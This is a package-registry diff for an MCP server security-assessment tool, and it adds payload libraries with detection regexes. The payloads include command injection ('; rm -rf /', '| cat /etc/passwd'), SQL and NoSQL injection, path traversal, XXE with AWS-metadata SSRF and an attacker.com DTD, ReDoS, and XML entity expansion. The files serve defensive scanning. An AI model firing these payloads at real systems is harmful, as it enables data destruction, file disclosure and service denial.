@bryan-thompson/inspector-assessment 1.36.5 → 1.38.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (104) hide show
  1. package/cli/build/lib/assessment-runner/assessment-executor.js +40 -0
  2. package/cli/build/lib/assessment-runner/source-loader.js +11 -0
  3. package/cli/package.json +1 -1
  4. package/client/dist/assets/{OAuthCallback-DJ1av7om.js → OAuthCallback-AngeBaCl.js} +1 -1
  5. package/client/dist/assets/{OAuthDebugCallback-lRXgX7wV.js → OAuthDebugCallback--FE6_fPs.js} +1 -1
  6. package/client/dist/assets/{index-DEdS99fp.js → index-BQC95Boo.js} +4 -4
  7. package/client/dist/index.html +1 -1
  8. package/client/lib/lib/assessment/coreTypes.d.ts +37 -0
  9. package/client/lib/lib/assessment/coreTypes.d.ts.map +1 -1
  10. package/client/lib/lib/assessment/resultTypes.d.ts +30 -1
  11. package/client/lib/lib/assessment/resultTypes.d.ts.map +1 -1
  12. package/client/lib/lib/assessment/sharedSchemas.d.ts +10 -0
  13. package/client/lib/lib/assessment/sharedSchemas.d.ts.map +1 -1
  14. package/client/lib/lib/assessment/sharedSchemas.js +4 -0
  15. package/client/lib/lib/securityPatterns/advancedExploitPatterns.d.ts +13 -0
  16. package/client/lib/lib/securityPatterns/advancedExploitPatterns.d.ts.map +1 -0
  17. package/client/lib/lib/securityPatterns/advancedExploitPatterns.js +504 -0
  18. package/client/lib/lib/securityPatterns/authSessionPatterns.d.ts +12 -0
  19. package/client/lib/lib/securityPatterns/authSessionPatterns.d.ts.map +1 -0
  20. package/client/lib/lib/securityPatterns/authSessionPatterns.js +357 -0
  21. package/client/lib/lib/securityPatterns/index.d.ts +18 -0
  22. package/client/lib/lib/securityPatterns/index.d.ts.map +1 -0
  23. package/client/lib/lib/securityPatterns/index.js +18 -0
  24. package/client/lib/lib/securityPatterns/injectionPatterns.d.ts +13 -0
  25. package/client/lib/lib/securityPatterns/injectionPatterns.d.ts.map +1 -0
  26. package/client/lib/lib/securityPatterns/injectionPatterns.js +356 -0
  27. package/client/lib/lib/securityPatterns/resourceExhaustionPatterns.d.ts +12 -0
  28. package/client/lib/lib/securityPatterns/resourceExhaustionPatterns.d.ts.map +1 -0
  29. package/client/lib/lib/securityPatterns/resourceExhaustionPatterns.js +215 -0
  30. package/client/lib/lib/securityPatterns/toolSpecificPatterns.d.ts +13 -0
  31. package/client/lib/lib/securityPatterns/toolSpecificPatterns.d.ts.map +1 -0
  32. package/client/lib/lib/securityPatterns/toolSpecificPatterns.js +373 -0
  33. package/client/lib/lib/securityPatterns/types.d.ts +20 -0
  34. package/client/lib/lib/securityPatterns/types.d.ts.map +1 -0
  35. package/client/lib/lib/securityPatterns/types.js +6 -0
  36. package/client/lib/lib/securityPatterns/utils.d.ts +56 -0
  37. package/client/lib/lib/securityPatterns/utils.d.ts.map +1 -0
  38. package/client/lib/lib/securityPatterns/utils.js +96 -0
  39. package/client/lib/lib/securityPatterns/validationPatterns.d.ts +13 -0
  40. package/client/lib/lib/securityPatterns/validationPatterns.d.ts.map +1 -0
  41. package/client/lib/lib/securityPatterns/validationPatterns.js +110 -0
  42. package/client/lib/lib/securityPatterns.d.ts +18 -69
  43. package/client/lib/lib/securityPatterns.d.ts.map +1 -1
  44. package/client/lib/lib/securityPatterns.js +18 -1946
  45. package/client/lib/services/assessment/AssessmentOrchestrator.d.ts +6 -1
  46. package/client/lib/services/assessment/AssessmentOrchestrator.d.ts.map +1 -1
  47. package/client/lib/services/assessment/config/performanceConfig.d.ts +18 -0
  48. package/client/lib/services/assessment/config/performanceConfig.d.ts.map +1 -1
  49. package/client/lib/services/assessment/config/performanceConfig.js +6 -0
  50. package/client/lib/services/assessment/config/performanceConfigSchemas.d.ts +18 -0
  51. package/client/lib/services/assessment/config/performanceConfigSchemas.d.ts.map +1 -1
  52. package/client/lib/services/assessment/config/performanceConfigSchemas.js +20 -0
  53. package/client/lib/services/assessment/helpers/ExternalAPIDependencyDetector.d.ts +165 -0
  54. package/client/lib/services/assessment/helpers/ExternalAPIDependencyDetector.d.ts.map +1 -0
  55. package/client/lib/services/assessment/helpers/ExternalAPIDependencyDetector.js +317 -0
  56. package/client/lib/services/assessment/helpers/StdioTransportDetector.d.ts +137 -0
  57. package/client/lib/services/assessment/helpers/StdioTransportDetector.d.ts.map +1 -0
  58. package/client/lib/services/assessment/helpers/StdioTransportDetector.js +315 -0
  59. package/client/lib/services/assessment/helpers/ToolAnnotationExtractor.d.ts +34 -0
  60. package/client/lib/services/assessment/helpers/ToolAnnotationExtractor.d.ts.map +1 -0
  61. package/client/lib/services/assessment/helpers/ToolAnnotationExtractor.js +85 -0
  62. package/client/lib/services/assessment/modules/ErrorHandlingAssessor.d.ts +23 -0
  63. package/client/lib/services/assessment/modules/ErrorHandlingAssessor.d.ts.map +1 -1
  64. package/client/lib/services/assessment/modules/ErrorHandlingAssessor.js +255 -20
  65. package/client/lib/services/assessment/modules/FunctionalityAssessor.d.ts +10 -0
  66. package/client/lib/services/assessment/modules/FunctionalityAssessor.d.ts.map +1 -1
  67. package/client/lib/services/assessment/modules/FunctionalityAssessor.js +65 -3
  68. package/client/lib/services/assessment/modules/ProtocolComplianceAssessor.d.ts.map +1 -1
  69. package/client/lib/services/assessment/modules/ProtocolComplianceAssessor.js +30 -0
  70. package/client/lib/services/assessment/modules/SecurityAssessor.d.ts.map +1 -1
  71. package/client/lib/services/assessment/modules/SecurityAssessor.js +6 -0
  72. package/client/lib/services/assessment/modules/TemporalAssessor.d.ts.map +1 -1
  73. package/client/lib/services/assessment/modules/TemporalAssessor.js +16 -3
  74. package/client/lib/services/assessment/modules/annotations/AlignmentChecker.d.ts.map +1 -1
  75. package/client/lib/services/assessment/modules/annotations/AlignmentChecker.js +6 -2
  76. package/client/lib/services/assessment/modules/annotations/DescriptionPoisoningDetector.d.ts.map +1 -1
  77. package/client/lib/services/assessment/modules/annotations/DescriptionPoisoningDetector.js +16 -7
  78. package/client/lib/services/assessment/modules/securityTests/AnnotationAwareSeverity.d.ts +55 -0
  79. package/client/lib/services/assessment/modules/securityTests/AnnotationAwareSeverity.d.ts.map +1 -0
  80. package/client/lib/services/assessment/modules/securityTests/AnnotationAwareSeverity.js +135 -0
  81. package/client/lib/services/assessment/modules/securityTests/ErrorClassifier.d.ts +14 -0
  82. package/client/lib/services/assessment/modules/securityTests/ErrorClassifier.d.ts.map +1 -1
  83. package/client/lib/services/assessment/modules/securityTests/ErrorClassifier.js +24 -1
  84. package/client/lib/services/assessment/modules/securityTests/SafeResponseDetector.d.ts +6 -0
  85. package/client/lib/services/assessment/modules/securityTests/SafeResponseDetector.d.ts.map +1 -1
  86. package/client/lib/services/assessment/modules/securityTests/SafeResponseDetector.js +9 -1
  87. package/client/lib/services/assessment/modules/securityTests/SecurityPatternLibrary.d.ts +43 -1
  88. package/client/lib/services/assessment/modules/securityTests/SecurityPatternLibrary.d.ts.map +1 -1
  89. package/client/lib/services/assessment/modules/securityTests/SecurityPatternLibrary.js +87 -1
  90. package/client/lib/services/assessment/modules/securityTests/SecurityPayloadTester.d.ts +39 -1
  91. package/client/lib/services/assessment/modules/securityTests/SecurityPayloadTester.d.ts.map +1 -1
  92. package/client/lib/services/assessment/modules/securityTests/SecurityPayloadTester.js +93 -3
  93. package/client/lib/services/assessment/modules/securityTests/SecurityResponseAnalyzer.d.ts +1 -1
  94. package/client/lib/services/assessment/modules/securityTests/SecurityResponseAnalyzer.d.ts.map +1 -1
  95. package/client/lib/services/assessment/modules/securityTests/SecurityResponseAnalyzer.js +10 -1
  96. package/client/lib/services/assessment/modules/securityTests/index.d.ts +1 -0
  97. package/client/lib/services/assessment/modules/securityTests/index.d.ts.map +1 -1
  98. package/client/lib/services/assessment/modules/securityTests/index.js +1 -0
  99. package/client/lib/services/assessment/modules/temporal/VarianceClassifier.d.ts +16 -1
  100. package/client/lib/services/assessment/modules/temporal/VarianceClassifier.d.ts.map +1 -1
  101. package/client/lib/services/assessment/modules/temporal/VarianceClassifier.js +43 -1
  102. package/client/package.json +1 -1
  103. package/package.json +1 -1
  104. package/server/package.json +1 -1
package/client/lib/lib/securityPatterns/injectionPatterns.js ADDED
@@ -0,0 +1,356 @@
1
+ /**
2
+ * Injection Attack Patterns
3
+ *
4
+ * Critical injection vulnerabilities - highest severity attacks.
5
+ * Includes: Command Injection, AppleScript Command Injection, SQL Injection,
6
+ * Calculator Injection, Path Traversal, XXE Injection, NoSQL Injection
7
+ */
8
+ /**
9
+ * Critical injection attack patterns (7 patterns)
10
+ */
11
+ export const INJECTION_PATTERNS = [
12
+ // 1. COMMAND INJECTION
13
+ {
14
+ attackName: "Command Injection",
15
+ description: "Test if tool executes system commands instead of treating them as safe parameters",
16
+ payloads: [
17
+ // System command payloads - might trigger command execution tools
18
+ {
19
+ payload: "whoami",
20
+ evidence: /\b(root|user|admin)\b/i,
21
+ riskLevel: "HIGH",
22
+ description: "System identity command",
23
+ payloadType: "injection",
24
+ },
25
+ {
26
+ payload: "ls -la",
27
+ // Issue #27: Tighten pattern to require ls -la specific context
28
+ // Avoids false positives from "X total in memory" tool status messages
29
+ evidence: /(total\s+\d+\s*$|^[d-][rwx-]{9}\s+\d+|drwxr|permissions\s+denied)/im,
30
+ riskLevel: "HIGH",
31
+ description: "Directory listing command",
32
+ payloadType: "injection",
33
+ },
34
+ {
35
+ payload: "pwd",
36
+ evidence: /\/[a-z]+/i,
37
+ riskLevel: "HIGH",
38
+ description: "Working directory command",
39
+ payloadType: "injection",
40
+ },
41
+ {
42
+ payload: "; rm -rf /",
43
+ evidence: /(deleted|removed|rm.*rf)/i,
44
+ riskLevel: "HIGH",
45
+ description: "Command chaining with destructive command",
46
+ payloadType: "injection",
47
+ },
48
+ {
49
+ payload: "| cat /etc/passwd",
50
+ evidence: /(root:x:|file.*protocol.*executed|local.*file.*ran)/i,
51
+ riskLevel: "HIGH",
52
+ description: "Pipe to file access command",
53
+ payloadType: "injection",
54
+ },
55
+ ],
56
+ },
57
+ // 2. APPLESCRIPT COMMAND INJECTION (Issue #174)
58
+ {
59
+ attackName: "AppleScript Command Injection",
60
+ description: "Test if tool executes arbitrary AppleScript/osascript commands via string interpolation",
61
+ payloads: [
62
+ // Double quote escape to shell execution
63
+ {
64
+ payload: '" & do shell script "id" & "',
65
+ evidence: /uid=\d+|gid=\d+|\broot\b(?=:|\s|$)|whoami\s*$/i,
66
+ riskLevel: "HIGH",
67
+ description: "AppleScript string escape to shell (double quotes)",
68
+ payloadType: "injection",
69
+ },
70
+ // Single quote escape variant
71
+ {
72
+ payload: "' & do shell script 'whoami' & '",
73
+ evidence: /uid=\d+|gid=\d+|\broot\b(?=:|\s|$)|whoami\s*$/i,
74
+ riskLevel: "HIGH",
75
+ description: "AppleScript string escape to shell (single quotes)",
76
+ payloadType: "injection",
77
+ },
78
+ // System info extraction
79
+ {
80
+ payload: "osascript -e 'return (system info)'",
81
+ evidence: /processor|memory|system.*version/i,
82
+ riskLevel: "MEDIUM",
83
+ description: "AppleScript system info extraction",
84
+ payloadType: "injection",
85
+ },
86
+ // File read via shell escape
87
+ {
88
+ payload: '" & do shell script "cat /etc/passwd" & "',
89
+ evidence: /root:.*:0:0|\/bin\/(ba)?sh/i,
90
+ riskLevel: "HIGH",
91
+ description: "AppleScript file read via shell escape",
92
+ payloadType: "injection",
93
+ },
94
+ ],
95
+ },
96
+ // 3. SQL INJECTION
97
+ {
98
+ attackName: "SQL Injection",
99
+ description: "Test if tool properly escapes SQL commands",
100
+ payloads: [
101
+ {
102
+ payload: "'; DROP TABLE users;--",
103
+ evidence: /(dropped|deleted|table.*users|sql.*error|syntax.*error)/i,
104
+ riskLevel: "HIGH",
105
+ description: "SQL command injection",
106
+ payloadType: "injection",
107
+ },
108
+ {
109
+ payload: "' OR '1'='1",
110
+ evidence: /(sql|query|select|where.*1.*1|syntax.*error)/i,
111
+ riskLevel: "HIGH",
112
+ description: "Boolean-based SQL injection",
113
+ payloadType: "injection",
114
+ },
115
+ {
116
+ payload: "admin'--",
117
+ evidence: /(sql.*executed|admin.*query|syntax.*error)/i,
118
+ riskLevel: "HIGH",
119
+ description: "Comment-based SQL injection",
120
+ payloadType: "injection",
121
+ },
122
+ {
123
+ payload: "' UNION SELECT * FROM passwords--",
124
+ evidence: /(union.*select|password|sql.*error|syntax.*error)/i,
125
+ riskLevel: "HIGH",
126
+ description: "UNION-based SQL injection",
127
+ payloadType: "injection",
128
+ },
129
+ ],
130
+ },
131
+ // 4. CALCULATOR INJECTION
132
+ {
133
+ attackName: "Calculator Injection",
134
+ description: "Test if calculator/math tools execute arbitrary expressions instead of safely storing them",
135
+ payloads: [
136
+ // Simple arithmetic - triggers eval() in vulnerable calculator tools
137
+ {
138
+ payload: "2+2",
139
+ evidence: /The answer is 4/i,
140
+ riskLevel: "HIGH",
141
+ description: "Simple arithmetic expression (common trigger)",
142
+ payloadType: "injection",
143
+ },
144
+ {
145
+ payload: "5*5",
146
+ evidence: /The answer is 25/i,
147
+ riskLevel: "HIGH",
148
+ description: "Multiplication expression",
149
+ payloadType: "injection",
150
+ },
151
+ {
152
+ payload: "100+200",
153
+ evidence: /The answer is 300/i,
154
+ riskLevel: "HIGH",
155
+ description: "Addition with larger numbers",
156
+ payloadType: "injection",
157
+ },
158
+ // Natural language triggers
159
+ {
160
+ payload: "what is 10*10",
161
+ evidence: /The answer is 100/i,
162
+ riskLevel: "HIGH",
163
+ description: "Natural language math query",
164
+ payloadType: "injection",
165
+ },
166
+ {
167
+ payload: "calculate 50+50",
168
+ evidence: /The answer is 100/i,
169
+ riskLevel: "HIGH",
170
+ description: "Calculate command",
171
+ payloadType: "injection",
172
+ },
173
+ // Code injection via eval()
174
+ {
175
+ payload: "__import__('os').system('whoami')",
176
+ evidence: /\b(root|user|admin|ubuntu)\b/i,
177
+ riskLevel: "HIGH",
178
+ description: "Python code injection via eval",
179
+ payloadType: "injection",
180
+ },
181
+ {
182
+ payload: "1+1; __import__('subprocess').run(['whoami'])",
183
+ evidence: /\b(root|user|admin|ubuntu)\b/i,
184
+ riskLevel: "HIGH",
185
+ description: "eval chain to system command",
186
+ payloadType: "injection",
187
+ },
188
+ ],
189
+ },
190
+ // 5. PATH TRAVERSAL
191
+ {
192
+ attackName: "Path Traversal",
193
+ description: "Test if tool allows access to files outside intended directory",
194
+ payloads: [
195
+ {
196
+ payload: "../../../etc/passwd",
197
+ evidence: /(root:x:0:0|file.*accessed|passwd.*file)/i,
198
+ riskLevel: "HIGH",
199
+ description: "Unix path traversal",
200
+ payloadType: "injection",
201
+ },
202
+ {
203
+ payload: "..\\..\\..\\windows\\system32\\config\\sam",
204
+ evidence: /(\[boot loader\]|sam.*file|system32)/i,
205
+ riskLevel: "HIGH",
206
+ description: "Windows path traversal",
207
+ payloadType: "injection",
208
+ },
209
+ {
210
+ payload: "/etc/passwd",
211
+ evidence: /(root:x:0:0|file.*accessed)/i,
212
+ riskLevel: "HIGH",
213
+ description: "Absolute path access",
214
+ payloadType: "injection",
215
+ },
216
+ {
217
+ payload: "file:///etc/passwd",
218
+ evidence: /(root:x:|file.*protocol.*executed|local.*file.*accessed)/i,
219
+ riskLevel: "HIGH",
220
+ description: "File protocol exploitation",
221
+ payloadType: "injection",
222
+ },
223
+ ],
224
+ },
225
+ // 6. XXE INJECTION (XML External Entity)
226
+ {
227
+ attackName: "XXE Injection",
228
+ description: "Test if tool processes XML external entities, allowing file disclosure or SSRF",
229
+ payloads: [
230
+ // Classic XXE - file disclosure
231
+ {
232
+ payload: '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>',
233
+ evidence: /(root:x:0:0|xxe.*processed|external.*entity.*loaded|file.*contents)/i,
234
+ riskLevel: "HIGH",
235
+ description: "XXE file disclosure via SYSTEM entity",
236
+ payloadType: "injection",
237
+ parameterTypes: ["xml", "data", "body", "payload", "content"],
238
+ },
239
+ // XXE with Windows path
240
+ {
241
+ payload: '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]><foo>&xxe;</foo>',
242
+ evidence: /(\[fonts\]|\[extensions\]|xxe.*processed|windows.*file.*accessed)/i,
243
+ riskLevel: "HIGH",
244
+ description: "XXE Windows file disclosure",
245
+ payloadType: "injection",
246
+ parameterTypes: ["xml", "data", "body", "payload"],
247
+ },
248
+ // XXE SSRF via HTTP entity
249
+ {
250
+ payload: '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]><foo>&xxe;</foo>',
251
+ evidence: /(ami-id|instance-id|xxe.*fetched|metadata.*accessed|ssrf.*xml)/i,
252
+ riskLevel: "HIGH",
253
+ description: "XXE SSRF to AWS metadata",
254
+ payloadType: "injection",
255
+ parameterTypes: ["xml", "data", "body", "payload"],
256
+ },
257
+ // Parameter entity XXE (blind XXE)
258
+ {
259
+ payload: '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">%xxe;]><foo>test</foo>',
260
+ evidence: /(dtd.*loaded|parameter.*entity|external.*dtd|xxe.*processed)/i,
261
+ riskLevel: "HIGH",
262
+ description: "Blind XXE via parameter entity",
263
+ payloadType: "injection",
264
+ parameterTypes: ["xml", "data", "body", "payload"],
265
+ },
266
+ // XXE in SOAP request
267
+ {
268
+ payload: '<?xml version="1.0"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><soap:Body><foo>&xxe;</foo></soap:Body></soap:Envelope>',
269
+ evidence: /(root:x:0:0|soap.*xxe|xxe.*soap|external.*entity)/i,
270
+ riskLevel: "HIGH",
271
+ description: "XXE in SOAP envelope",
272
+ payloadType: "injection",
273
+ parameterTypes: ["xml", "soap", "body", "request"],
274
+ },
275
+ ],
276
+ },
277
+ // 7. NOSQL INJECTION
278
+ {
279
+ attackName: "NoSQL Injection",
280
+ description: "Test if tool is vulnerable to NoSQL injection attacks (MongoDB, Redis, etc.)",
281
+ payloads: [
282
+ // MongoDB operator injection
283
+ {
284
+ payload: '{"$gt": ""}',
285
+ evidence: /(all.*documents|query.*executed|mongodb.*error|operator.*injection|nosql.*executed)/i,
286
+ riskLevel: "HIGH",
287
+ description: "MongoDB $gt operator injection",
288
+ payloadType: "injection",
289
+ parameterTypes: ["query", "filter", "where", "search", "data"],
290
+ },
291
+ // MongoDB $ne always-true
292
+ {
293
+ payload: '{"$ne": null}',
294
+ evidence: /(returned.*all|bypass.*auth|nosql.*injection|query.*result|documents.*found)/i,
295
+ riskLevel: "HIGH",
296
+ description: "MongoDB $ne bypass injection",
297
+ payloadType: "injection",
298
+ parameterTypes: ["query", "filter", "where", "password", "username"],
299
+ },
300
+ // MongoDB $where JavaScript injection
301
+ {
302
+ payload: '{"$where": "this.password.match(/.*/)"}',
303
+ evidence: /(javascript.*executed|\$where.*processed|nosql.*js|all.*passwords|query.*executed)/i,
304
+ riskLevel: "HIGH",
305
+ description: "MongoDB $where JavaScript injection",
306
+ payloadType: "injection",
307
+ parameterTypes: ["query", "filter", "where", "data"],
308
+ },
309
+ // MongoDB $regex DOS
310
+ {
311
+ payload: '{"$regex": "^(a+)+$"}',
312
+ evidence: /(regex.*executed|redos|timeout|catastrophic.*backtracking|query.*slow)/i,
313
+ riskLevel: "MEDIUM",
314
+ description: "MongoDB ReDoS via $regex",
315
+ payloadType: "injection",
316
+ parameterTypes: ["query", "filter", "search", "pattern"],
317
+ },
318
+ // MongoDB union-style query
319
+ {
320
+ payload: "admin', $or: [ {}, { 'a': 'a",
321
+ evidence: /(admin.*returned|auth.*bypass|or.*injection|nosql.*executed)/i,
322
+ riskLevel: "HIGH",
323
+ description: "MongoDB $or injection bypass",
324
+ payloadType: "injection",
325
+ parameterTypes: ["username", "user", "name", "query"],
326
+ },
327
+ // Redis command injection
328
+ {
329
+ payload: "test\r\nCONFIG GET *\r\n",
330
+ evidence: /(redis.*config|requirepass|maxmemory|save.*seconds|redis.*command.*executed)/i,
331
+ riskLevel: "HIGH",
332
+ description: "Redis CRLF command injection",
333
+ payloadType: "injection",
334
+ parameterTypes: ["key", "value", "data", "input"],
335
+ },
336
+ // Redis Lua script injection
337
+ {
338
+ payload: "EVAL \"return redis.call('INFO')\" 0",
339
+ evidence: /(redis_version|used_memory|connected_clients|lua.*executed)/i,
340
+ riskLevel: "HIGH",
341
+ description: "Redis Lua script injection",
342
+ payloadType: "injection",
343
+ parameterTypes: ["script", "command", "query", "data"],
344
+ },
345
+ // CouchDB injection
346
+ {
347
+ payload: '{"selector": {"$or": [{"_id": {"$gt": null}}]}}',
348
+ evidence: /(all.*documents|couchdb.*query|selector.*executed|documents.*returned)/i,
349
+ riskLevel: "HIGH",
350
+ description: "CouchDB selector injection",
351
+ payloadType: "injection",
352
+ parameterTypes: ["query", "selector", "filter", "find"],
353
+ },
354
+ ],
355
+ },
356
+ ];
package/client/lib/lib/securityPatterns/resourceExhaustionPatterns.d.ts ADDED
@@ -0,0 +1,12 @@
1
+ /**
2
+ * Resource Exhaustion and Deserialization Patterns
3
+ *
4
+ * Tests for DoS, resource exhaustion, and deserialization vulnerabilities.
5
+ * Includes: DoS/Resource Exhaustion, Insecure Deserialization
6
+ */
7
+ import { AttackPattern } from "./types.js";
8
+ /**
9
+ * Resource exhaustion and deserialization patterns (2 patterns)
10
+ */
11
+ export declare const RESOURCE_EXHAUSTION_PATTERNS: AttackPattern[];
12
+ //# sourceMappingURL=resourceExhaustionPatterns.d.ts.map
package/client/lib/lib/securityPatterns/resourceExhaustionPatterns.d.ts.map ADDED
@@ -0,0 +1 @@
1
+ {"version":3,"file":"resourceExhaustionPatterns.d.ts","sourceRoot":"","sources":["../../../src/lib/securityPatterns/resourceExhaustionPatterns.ts"],"names":[],"mappings":"AAAA;;;;;GAKG;AAEH,OAAO,EAAE,aAAa,EAAE,MAAM,SAAS,CAAC;AAExC;;GAEG;AACH,eAAO,MAAM,4BAA4B,EAAE,aAAa,EAsOvD,CAAC"}
package/client/lib/lib/securityPatterns/resourceExhaustionPatterns.js ADDED
@@ -0,0 +1,215 @@
1
+ /**
2
+ * Resource Exhaustion and Deserialization Patterns
3
+ *
4
+ * Tests for DoS, resource exhaustion, and deserialization vulnerabilities.
5
+ * Includes: DoS/Resource Exhaustion, Insecure Deserialization
6
+ */
7
+ /**
8
+ * Resource exhaustion and deserialization patterns (2 patterns)
9
+ */
10
+ export const RESOURCE_EXHAUSTION_PATTERNS = [
11
+ // 19. DOS/RESOURCE EXHAUSTION
12
+ {
13
+ attackName: "DoS/Resource Exhaustion",
14
+ description: "Test if tool is vulnerable to denial of service through resource exhaustion (ReDoS, memory allocation, timeout abuse)",
15
+ payloads: [
16
+ // ReDoS Payloads (Catastrophic Backtracking)
17
+ {
18
+ payload: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!",
19
+ evidence: /timeout|timed.?out|catastrophic|backtrack|hung|unresponsive|resource.?limit|regex.?timeout/i,
20
+ riskLevel: "HIGH",
21
+ description: "ReDoS via evil regex input (catastrophic backtracking)",
22
+ payloadType: "dos",
23
+ parameterTypes: [
24
+ "pattern",
25
+ "regex",
26
+ "search",
27
+ "query",
28
+ "filter",
29
+ "text",
30
+ "input",
31
+ ],
32
+ },
33
+ {
34
+ payload: "(a+)+b",
35
+ evidence: /timeout|timed.?out|catastrophic|backtrack|regex.?error|pattern.?error|stack.?overflow/i,
36
+ riskLevel: "HIGH",
37
+ description: "ReDoS via nested quantifier pattern",
38
+ payloadType: "dos",
39
+ parameterTypes: ["pattern", "regex", "search", "query", "filter"],
40
+ },
41
+ {
42
+ payload: "a]a]a]a]a]a]a]a]a]a]a]a]a]a]a]a]",
43
+ evidence: /timeout|backtrack|regex.?overflow|stack.?overflow|parse.?error/i,
44
+ riskLevel: "HIGH",
45
+ description: "ReDoS via character class abuse",
46
+ payloadType: "dos",
47
+ parameterTypes: ["pattern", "regex", "search", "query"],
48
+ },
49
+ {
50
+ payload: "^(([a-z])+.)+[A-Z]([a-z])+$",
51
+ evidence: /timeout|catastrophic|backtrack|polynomial|exponential|regex.?complexity/i,
52
+ riskLevel: "HIGH",
53
+ description: "ReDoS via polynomial complexity pattern",
54
+ payloadType: "dos",
55
+ parameterTypes: ["pattern", "regex", "search", "query", "filter"],
56
+ },
57
+ // Memory Allocation Payloads
58
+ {
59
+ payload: "999999999999",
60
+ evidence: /memory.?error|allocation.?failed|out.?of.?memory|heap|buffer.?overflow|resource.?limit|integer.?overflow/i,
61
+ riskLevel: "HIGH",
62
+ description: "Memory exhaustion via large number input",
63
+ payloadType: "dos",
64
+ parameterTypes: [
65
+ "size",
66
+ "count",
67
+ "length",
68
+ "limit",
69
+ "amount",
70
+ "quantity",
71
+ "number",
72
+ ],
73
+ },
74
+ {
75
+ // Pre-evaluated 10KB string
76
+ payload: "x".repeat(10000),
77
+ evidence: /too.?long|exceeds.?length|maximum.?length|length.?limit|resource.?limit|payload.?too.?large|memory/i,
78
+ riskLevel: "MEDIUM",
79
+ description: "Memory exhaustion via large string payload (10KB)",
80
+ payloadType: "dos",
81
+ },
82
+ {
83
+ // 10-level deep nested JSON
84
+ payload: '{"a":{"a":{"a":{"a":{"a":{"a":{"a":{"a":{"a":{"a":{}}}}}}}}}}}',
85
+ evidence: /stack.?overflow|recursion|depth.?limit|nesting.?limit|too.?deep|parse.?error|json.?depth/i,
86
+ riskLevel: "HIGH",
87
+ description: "Stack exhaustion via deep JSON nesting",
88
+ payloadType: "dos",
89
+ parameterTypes: ["data", "json", "body", "payload", "input"],
90
+ },
91
+ // Timeout Abuse Payloads
92
+ {
93
+ payload: "sleep(99999)",
94
+ evidence: /timeout|timed.?out|operation.?cancelled|deadline|long.?running|sleep.?executed/i,
95
+ riskLevel: "HIGH",
96
+ description: "Timeout abuse via sleep command injection",
97
+ payloadType: "dos",
98
+ parameterTypes: ["command", "script", "code", "expression", "input"],
99
+ },
100
+ {
101
+ payload: "WAITFOR DELAY '00:10:00'",
102
+ evidence: /timeout|timed.?out|sql.?timeout|query.?timeout|waitfor.?executed/i,
103
+ riskLevel: "HIGH",
104
+ description: "Timeout abuse via SQL WAITFOR",
105
+ payloadType: "dos",
106
+ parameterTypes: ["query", "sql", "command"],
107
+ },
108
+ {
109
+ // 20-level nested array
110
+ payload: "[[[[[[[[[[[[[[[[[[[[]]]]]]]]]]]]]]]]]]]]",
111
+ evidence: /stack.?overflow|recursion|depth|nesting|too.?deep|parse.?error/i,
112
+ riskLevel: "MEDIUM",
113
+ description: "Stack exhaustion via nested arrays",
114
+ payloadType: "dos",
115
+ parameterTypes: ["data", "array", "list", "items"],
116
+ },
117
+ // Expansion Attacks
118
+ {
119
+ // Zip bomb indicator (base64 header of compressed content)
120
+ payload: "UEsDBBQAAAAIAAAAAACJBAAAAAAAAQAAAAEAAABhYQAAUEsBAhQAFAAAAAgA",
121
+ evidence: /zip.?bomb|compression|decompression.?error|expand|inflate|extraction.?limit|archive.?too.?large/i,
122
+ riskLevel: "HIGH",
123
+ description: "Zip bomb indicator via compressed content header",
124
+ payloadType: "dos",
125
+ parameterTypes: ["file", "data", "content", "upload", "attachment"],
126
+ },
127
+ {
128
+ // XML Billion Laughs (truncated safe version)
129
+ payload: '<?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY lol "lol"><!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;"><!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;">]><lolz>&lol3;</lolz>',
130
+ evidence: /entity.?expansion|xml.?bomb|billion.?laughs|too.?many.?entities|memory|resource.?limit|xml.?depth/i,
131
+ riskLevel: "HIGH",
132
+ description: "XML entity expansion (Billion Laughs) attack",
133
+ payloadType: "dos",
134
+ parameterTypes: ["xml", "data", "body", "payload", "content"],
135
+ },
136
+ ],
137
+ },
138
+ // 20. INSECURE DESERIALIZATION
139
+ {
140
+ attackName: "Insecure Deserialization",
141
+ description: "Test if tool deserializes untrusted data using unsafe methods like pickle.loads(), potentially allowing RCE",
142
+ payloads: [
143
+ // Python Pickle Payloads
144
+ {
145
+ payload: "deserialize this pickle data",
146
+ evidence: /deserializ|pickle\.loads|RCE|untrusted.*pickle|potential.*rce/i,
147
+ riskLevel: "HIGH",
148
+ description: "Python pickle deserialization trigger",
149
+ payloadType: "injection",
150
+ parameterTypes: ["data", "input", "payload", "content"],
151
+ },
152
+ {
153
+ // Base64-encoded pickle prefix (triggers deserialization attempt)
154
+ payload: "gASVEAAAAAAAAACMBHRlc3SULg==",
155
+ evidence: /deserializ|pickle|unpickle|RCE|executed/i,
156
+ riskLevel: "HIGH",
157
+ description: "Base64-encoded pickle payload",
158
+ payloadType: "injection",
159
+ parameterTypes: ["data", "input", "serialized", "encoded"],
160
+ },
161
+ {
162
+ payload: "__import__('os').system via pickle",
163
+ evidence: /deserializ|pickle|RCE|os\.system|__reduce__|code.*execution/i,
164
+ riskLevel: "HIGH",
165
+ description: "Pickle with code execution hint",
166
+ payloadType: "injection",
167
+ parameterTypes: ["data", "input", "payload"],
168
+ },
169
+ {
170
+ payload: "marshal.loads(untrusted_data)",
171
+ evidence: /marshal|deserializ|RCE|code.*execution|unsafe.*load/i,
172
+ riskLevel: "HIGH",
173
+ description: "Python marshal deserialization",
174
+ payloadType: "injection",
175
+ parameterTypes: ["data", "input", "payload"],
176
+ },
177
+ // Java/Other Serialization Payloads
178
+ {
179
+ // Java serialized object marker (base64 prefix)
180
